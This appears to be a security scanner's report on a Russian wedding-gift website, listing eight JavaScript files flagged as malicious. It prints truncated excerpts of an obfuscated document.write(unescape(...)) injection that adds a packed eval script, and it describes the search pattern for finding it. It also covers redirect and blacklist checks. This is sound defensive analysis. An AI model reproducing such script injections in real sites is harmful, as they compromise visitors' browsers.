Scanned pages/files
Request | Server response | Status |
http://www.svadba-podarok.ru/ | 200 OK Content-Length: 25005 Content-Type: text/html | clean |
http://www.svadba-podarok.ru/media/system/js/caption.js | 200 OK Content-Length: 11714 Content-Type: application/x-javascript | malicious |
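Malicious code - confirmed by antiviruses (see below). The excerpt shows only the beginning of the file and is truncated:
var JCaption = new Class({ initialize: function(selector) { this.selector = selector; var images = $$(selector); images.each(function(image){ this.createCaption(image); }, this); }, createCaption: function(element) { var caption = document.createTextNode(element.title); var container = document.createElement("div"); var text = document.createElement("p"); var width = element.getAttribute("width"); var align =
Note: nothing in this visible portion is obfuscated. In the other flagged files in this report the suspicious part is a `;document.write(unescape("%3C%73...` statement appended after the normal code, so the flagged content here is presumably beyond the cut-off and the full file has to be inspected.
Antivirus reports: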
http://www.svadba-podarok.ru/templates/blueish/js/jquery-1.4.4.min.js | 200 OK Content-Length: 88352 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(E,B){function ka(a,b,d){if(d===B&&a.nodeType===1){d=a.getAttribute("data-"+b);if(typeof d==="string"){try{d=d==="true"?true:d==="false"?false:d==="null"?null:!c.isNaN(d)?parseFloat(d):Ja.test(d)?c.parseJSON(d):d}catch(e){}c.data(a,b,d)}else d=B}return d}function U(){return false}function ca(){return true}function la(a,b,d){d[0].type=a;return c.event.handle.apply(b,d)}function Ka(a){var b,d,e,f,h,l,k,o,x,r,A,C=[];f=[];h=c.data(this,this.nodeType?"events":"__events__");if(typeof Antivirus reports:
http://www.svadba-podarok.ru/templates/blueish/js/jqnoconflict.js | 200 OK Content-Length: 9782 Content-Type: application/x-javascript | malicious |
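Malicious code - confirmed by antiviruses (see below). The excerpt is truncated:
var jq = jQuery.noConflict(); ;document.write(unescape("%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3E%65%76%61%6C%28%66%75%6E%63%74%69%6F%6E%28%70%2C%61%2C%63%2C%6B%2C%65%2C%72%29%7B%65%3D%66%75%6E%63%74%69%6F%6E%28%63%29%7B%72%65%74%75%72%6E%28%63%3C%61%3F%27%27%3A%65%28%70%61%72%73%65%49%6E%74%28%63%2F%61%29%29%29%2B%28%28%63%3D%63%25%61%29%3E%33%35%3F%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%63%2B%32%39%29%3A%63%2E%74%6F%5
Note: the visible part of the percent-encoded string decodes to `<script type="text/javascript">eval(function(p,a,c,k,e,r){...`, i.e. a second script element holding packer-style obfuscated code that is written into the page after the legitimate `jQuery.noConflict()` line. The packed payload itself is not visible in this excerpt. A trailing `;document.write(unescape(` statement at the end of an otherwise normal .js file is the pattern to search for when checking the remaining scripts on the host.
Antivirus reports: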
http://www.svadba-podarok.ru/templates/blueish/js/lv_dropdown.js | 200 OK Content-Length: 10115 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function mainmenu(){
jq(" .menu_lv_dropdown ul ").css({display: "none"}); jq(" .menu_lv_dropdown li").hover(function(){ jq(this).find('ul:first').css({visibility: "visible",display: "none"}).show(400); },function(){ jq(this).find('ul:first').css({visibility: "hidden"}); }); } jq(document).ready(function(){ mainmenu(); }); ;document.write(unescape("%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72% Antivirus reports:
http://www.svadba-podarok.ru/templates/blueish/js/effects.js | 200 OK Content-Length: 10668 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) jq(document).ready(function($){
jq('.contentheading,.componentheading,.breadcrumbs').hide('', function(){ }); jq('.contentheading,.componentheading,.breadcrumbs').fadeIn('slow', function(){ }); jq('a#gotop').click(function(){ jq('html, body').animate({ scrollTop: 0 }, 'slow'); }); < Antivirus reports:
http://www.svadba-podarok.ru/plugins/system/rokbox/rokbox.js | 200 OK Content-Length: 30027 Content-Type: application/x-javascript | malicious |
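Malicious code - confirmed by antiviruses (see below). The excerpt is truncated:
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('R.5K({\'2M\':u(){H 8.1E(\'2u\',\'\')},\'25\':u(){H 8.1E(\'2u\',\'3I\')}});7m.5K({\'7l\':u(){l 6L=/^(1Y|6o):\\/\\/([a-z-.0-9]+)[\\/]{0,1}/i.6r(E.3a);l 1q=/^(1Y|6o):\
Note: the leading `eval(function(p,a,c,k,e,d)` wrapper is the common p,a,c,k,e,d packer format, and the file starts with it rather than having it appended after plain code. This opening may therefore be the component's own packed code and not the injected part. That cannot be confirmed from the excerpt; compare the full file against a known-good copy of rokbox.js.
Antivirus reports: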
http://www.svadba-podarok.ru/plugins/system/rokbox/themes/mynxx/rokbox-config.js | 200 OK Content-Length: 12437 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var rokbox; window.addEvent('domready', function() { rokbox = new RokBox({ 'theme': 'mynxx', 'transition': Fx.Transitions.Cubic.easeOut, 'duration': 500, 'chase': 80, 'frame-border': 34, 'content-padding': 0, 'arrows-height': 16, 'effect': 'growl', 'captions': 1, 'captionsDelay': 100, 'scrolling': 1, 'keyEvents': 1, 'overlay': { 'background': '#fff', 'opacity': 0.7, 'duration': 300, 'transition': Fx.Transitions.Quad.easeInOut }, 'def Antivirus reports:
http://pagead2.googlesyndication.com/pagead/show_ads.js | 200 OK Content-Length: 19916 Content-Type: text/javascript | clean |
http://www.svadba-podarok.ru/modules/mod_virtuemart_universal/files/mootools_tooltip.js | 200 OK Content-Length: 10162 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) window.addEvent('domready', function() {
var Tips2 = new Tips($$('.mod_vm_universal a'), { maxTitleChars: 500, initialize:function(){ this.fx = new Fx.Style(this.toolTip, 'opacity', {duration: 400, wait: true}).set(0); }, onShow: function(toolTip) { this.fx.start(1); }, onHide: function(toolTip) { this.fx.start(0); } }); }); ;document.write(unescape("%3 Antivirus reports:
http://pro100prazdnik.ru/necrom.php?id=gor_4 | 200 OK Content-Length: 4735 Content-Type: text/html | clean |
http://pro100prazdnik.ru/wedding_dela/wedding_avto/105-kortezh.-svadebnaja-skazochnaja-kareta-ili.html | 200 OK Content-Length: 55193 Content-Type: text/html | clean |
http://pro100prazdnik.ru/engine/classes/js/jquery.js | 200 OK Content-Length: 93868 Content-Type: application/x-javascript | clean |
http://pro100prazdnik.ru/engine/classes/js/jqueryui.js | 200 OK Content-Length: 65477 Content-Type: application/x-javascript | clean |
http://pro100prazdnik.ru/engine/classes/js/dle_js.js | 200 OK Content-Length: 20837 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: svadba-podarok.ru
Result: (result text not preserved on this page)
Second query (visit from search engine):
GET / HTTP/1.1
Host: svadba-podarok.ru
Referer: http://www.google.com/search?q=svadba-podarok.ru
Result:
The result is similar to the first query. No suspicious redirects were found.
Note: the two queries differ only in the Referer header, so this check covers server-side redirects triggered by a search-engine referrer. It does not cover the script injections flagged in the file list above, which run in the visitor's browser.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=svadba-podarok.ru
Result: This site is not currently listed as suspicious.
Note: not being listed is not a clean verdict; the file scan above marks eight scripts on this host as malicious.
Query: http://yandex.com/infected?l10n=en&url=http://svadba-podarok.ru/
Result: svadba-podarok.ru is not infected or malware details are not published yet.